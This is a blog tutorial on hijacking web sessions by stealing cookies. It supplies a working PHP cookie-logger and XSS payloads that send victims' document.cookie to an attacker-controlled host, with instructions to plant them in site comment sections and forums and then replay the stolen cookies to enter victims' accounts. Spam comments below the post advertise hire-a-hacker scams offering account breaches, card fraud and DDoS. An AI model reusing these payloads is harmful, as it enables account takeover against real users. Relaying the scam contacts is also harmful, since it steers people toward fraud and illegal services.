In computer science, session
hijacking refers to the exploitation of a valid computer
session—sometimes also called a session key—to gain unauthorized access
to information or services in a computer system. In particular, it is used to refer to the theft of a magic cookie used to authenticate a user to a remote server. It has particular relevance to web developers, as the HTTP cookies used to maintain a session on many web sites
can be easily stolen by an attacker using an intermediary computer or
with access to the saved cookies on the victim's computer (see HTTP
cookie theft).
Here we show how you can hack a session using javascript and php.
What is a cookie?
A cookie known as a web cookie or http cookie is a small piece of text
stored by the user browser.A cookie is sent as an header by the web server to the web browser on the client side.A cookie is static and is sent back by the browser unchanged everytime it accesses the server.
A cookie has a expiration time that is set by the server and are deleted automatically after the expiration time.
Cookie is used to maintain users authentication and to implement
shopping cart during his navigation,possibly across multiple visits.
What can we do after stealing cookie?
Well,as we know web sites authenticate their user's with a cookie,it can
be used to hijack the victims session.The victims stolen cookie can be
replaced with our cookie to hijack his session.
This is a cookie stealing script that steals the cookies of a user and store them in a text file, these cookied can later be utilised.
PHP Code:
<?php
function GetIP()
{
if (getenv("HTTP_CLIENT_IP") && strcasecmp(getenv("HTTP_CLIENT_IP"), "unknown"))
$ip = getenv("HTTP_CLIENT_IP");
else if (getenv("HTTP_X_FORWARDED_FOR") && strcasecmp(getenv("HTTP_X_FORWARDED_FOR"), "unknown"))
$ip = getenv("HTTP_X_FORWARDED_FOR");
else if (getenv("REMOTE_ADDR") && strcasecmp(getenv("REMOTE_ADDR"), "unknown"))
$ip = getenv("REMOTE_ADDR");
else if (isset($_SERVER['REMOTE_ADDR']) &&
$_SERVER['REMOTE_ADDR'] && strcasecmp($_SERVER['REMOTE_ADDR'],
"unknown"))
$ip = $_SERVER['REMOTE_ADDR'];
else
$ip = "unknown";
return($ip);
}
function logData()
{
$ipLog="log.txt";
$cookie = $_SERVER['QUERY_STRING'];
$register_globals = (bool) ini_get('register_gobals');
if ($register_globals) $ip = getenv('REMOTE_ADDR');
else $ip = GetIP();
$rem_port = $_SERVER['REMOTE_PORT'];
$user_agent = $_SERVER['HTTP_USER_AGENT'];
$rqst_method = $_SERVER['METHOD'];
$rem_host = $_SERVER['REMOTE_HOST'];
$referer = $_SERVER['HTTP_REFERER'];
$date=date ("l dS of F Y h:i:s A");
$log=fopen("$ipLog", "a+");
if (preg_match("/\bhtm\b/i", $ipLog) || preg_match("/\bhtml\b/i", $ipLog))
fputs($log, "IP: $ip | PORT: $rem_port | HOST: $rem_host | Agent:
$user_agent | METHOD: $rqst_method | REF: $referer | DATE{ : } $date |
COOKIE: $cookie
");
else
fputs($log, "IP: $ip | PORT: $rem_port | HOST: $rem_host | Agent:
$user_agent | METHOD: $rqst_method | REF: $referer | DATE: $date |
COOKIE: $cookie \n\n");
fclose($log);
}
logData();
?>
Save the script as a cookielogger.php on your server.
(You can get any free webhosting easily such as justfree,x10hosting etc..)
Create an empty text file log.txt in the same directory on the webserver. The hijacked/hacked cookies will be automatically stored here.
Now for the hack to work we have to inject this piece of javascript into
the target's page. This can be done by adding a link in the comments
page which allows users to add hyperlinks etc. But beware some sites
dont allow javascript so you gotta be lucky to try this.
The best way is to look for user interactive sites which contain comments or forums.
Post the following code which invokes or activates the cookielogger on your host.
Code:
<script language="Java script">
document.location="http://www.yourhost.com/cookielogger.php?cookie=" + document.cookie;
</script>
Your can also trick the victim into clicking a link that activates javascript.
Below is the code which has to be posted.
Code:
<a href="java script:document.location='http://www.yourhost.com/cookielogger.php?cookie='+document.cookie;">Click here!</a>
Clicking an image also can activate the script.For this purpose you can use the below code.
Code:
<a href="java script:document.location='http://www.yourhost.com/cookielogger.php?cookie='+document.cookie;">
<img src="URL OF THE IMAGE"/></a>
All the details like cookie,ipaddress,browser of the victim are logged in to log.txt on your hostserver
In the above codes please remove the space in between javascript.
Hijacking the Session:
Now we have cookie,what to do with this..?
Download cookie editor mozilla plugin or you may find other plugins as well.
Go to the target site-->open cookie editor-->Replace the cookie
with the stolen cookie of the victim and refresh the page.Thats it!!!you
should now be in his account. Download cookie editor mozilla plugin
from here : https://addons.mozilla.org/en-US/firefox/addon/573
Don't forget to comment if you like my post.
by hackiteasy
To that one person or persons out there who really need a true and efficient hacker i would advice you contact (fabuloushacker01@gmail.com) he just offered me top notch services and he is capable of offering hacking services of any sort. P .s i am only doing this to help other from meeting this fake so called hackers who soil the good names of powerfull and genuine hacker. Do mention Kim when contacting him as he can be understandably wary.
Trả lờiXóaHAVE YOU BEEN IN SEARCH FOR GENUINE HACKER'S ONLINE?. HAVE YOU LOST YOUR MONEY TO BINARY SCAMMERS OR ANY ONLINE SCAM WHATSOEVER?. WELL, YOU HAVE FOUND REDEMPTION IN ASORE CORP.
Trả lờiXóaasorehackcorp@gmail.com
Asore Corp is a Russian based group of multinational Hacker's, an affiliate of Evil Corp. We have mutual interests obliged to fight online scam and scammers in general. In doing this, we make sure by all means necessary that our clients get the best of services on a🔐PAYMENT AFTER JOB IS DONE BASIS✔️. Rather than send money and trust a criminal to fulfill your deal, you can make sure the job is done before it's paid for. You'll get excellent customer service. And it will cost a lot less than you think.
That's a 100% guarantee.
⚠️ BEWARE OF FRAUDSTARS
if you have been a VICTIM, contact us via:
✅ mercurycrimewatch@gmail.com
Here, it's always a win for you.
Having been on various headlines since 2004 hitherto, Asore Corp hosted a conference in August 2006 tagged "The Hacker's profile", which was anchored by Morgan Marquis Boire a then Hacker at Microsoft. Also, Asore Corp have acquired a hall of fame well deserved for solving tedious puzzles shocking the internet countless times. We possess highly qualified hackers recruited and registered under the right agencies.
Without any reasonable doubts, it is no news that Asore Corp offer one of the best Hacking services world wide.
Amongst others, services we offer are listed 📌as follows :
Social media hack, (Facebook, Instagram, snapchat,Zoom, Tik tok etc)✔️
Credit card top up,✔️
Credit card dept clearing.✔️
Database hack,✔️
Money transfer,✔️
Verified Paypal Accounts hack,✔️
E mail hack,✔️
College score upgrade ,✔️
Android & iPhone Hack✔️
BinaryOption funds recovery ✔️
Website design ✔️
Website hack✔️
etc.
CONTACT:
🤳asorehackcorp@gmail.com
cryptocoinintel@gmail.com
Asore Corp®️
©️2020
Terms and conditions apply.
I AM A PROFESSIONAL HACKER WITH YEARS OF EXPERIENCE, I AM A CERTIFIED PENETRATION TESTER WITH A WIDE ARRAY OF SKILLS, WHICH INCLUDE EMAIL HACKS, DDOS ATTACK, SOCIAL MEDIA HACK, RECOVERY OF LOST DATA, PHONE HACKS, GPS TRACKING, MOBILE APP HACKS, CLOUD DATA PENETRATION, UNLOCKING OF DEVICES,BITCOIN HACK,BANK TRANFER HACK,(APPLE INCLUSIVE) AND MANY MORE,AND HE HIS CHEAP AND AFFORDABLE. Contact Blackcyberwizard@gmail.com
Trả lờiXóa